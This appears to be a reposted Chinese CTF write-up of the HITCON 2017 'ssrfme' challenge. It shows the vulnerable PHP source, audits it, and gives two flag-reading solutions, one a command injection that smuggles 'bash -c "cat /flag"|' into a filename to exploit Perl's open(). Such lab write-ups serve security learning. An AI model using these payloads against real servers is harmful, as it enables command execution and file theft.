• 微信公众号:美女很有趣。 工作之余,放松一下,关注即送10G+美女照片!

bmzctf 刷题 hitcon_2017_ssrfme

开发技术 开发技术 2小时前 1次浏览

bmzctf 刷题 hitcon_2017_ssrfme

这道题有两种解法!

直接上源码

<?php 
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__);

代码审计

代码逻辑:
1.sandbox=sandbox/+md5(orange+ip地址)
2.escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数,传入的url转成shell命令
3.shell_exec— 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回,执行GET方式传入的URL
4.pathinfo就是以数组的形式返回文件路径的信息
5.basename — 返回路径中的文件名部分,返回filename传入的文件名
6.file_put_contents — 将一个字符串写入文件,将date内容传入dir的路径

解法1

先得出自己的md5(orange+ip)数值
访问sandbox/内的自己路径
bmzctf 刷题 hitcon_2017_ssrfme
Forbidden,而不是not found
url传入/,escapeshellarg将其转为cd /
filename传入随便的一个名字123456
payload?url=/&filename=123456
bmzctf 刷题 hitcon_2017_ssrfme
啊..很成功🎉️
看到了一个flag
尝试去读它
?url=/flag&filename=123456

bmzctf 刷题 hitcon_2017_ssrfme

enmmmm,这个出题者脑子有个大病

试一下万能的txt后缀

?url=/flag&filename=123456.txt

bmzctf 刷题 hitcon_2017_ssrfme

啪,flag出了

解法2 perl脚本open命令执行

来自:https://blog.csdn.net/qq_26243045/article/details/110186332

ps:Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。

这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件

payload:
?url=aaaa&filename=bash -c "cat /flag"|
写入有以bash -c "cat /flag"|为文件名,内容为aaaa的文件

payload
?url=file:bash -c "cat /flag"|&filename=ccc.txt
通过file协议将bash -c "cat /flag"|文件名存入ccc.txt

访问ccc.txt
bmzctf 刷题 hitcon_2017_ssrfme
拿到flag

PS

解法2虽然相较于解法1过程相对复杂,但其使用了file协议,Perl的open函数读取文件名作为内容,思路还是很值得学习的,在其他的环境下更具与普遍性。


程序员灯塔
转载请注明原文链接:bmzctf 刷题 hitcon_2017_ssrfme
喜欢 (0)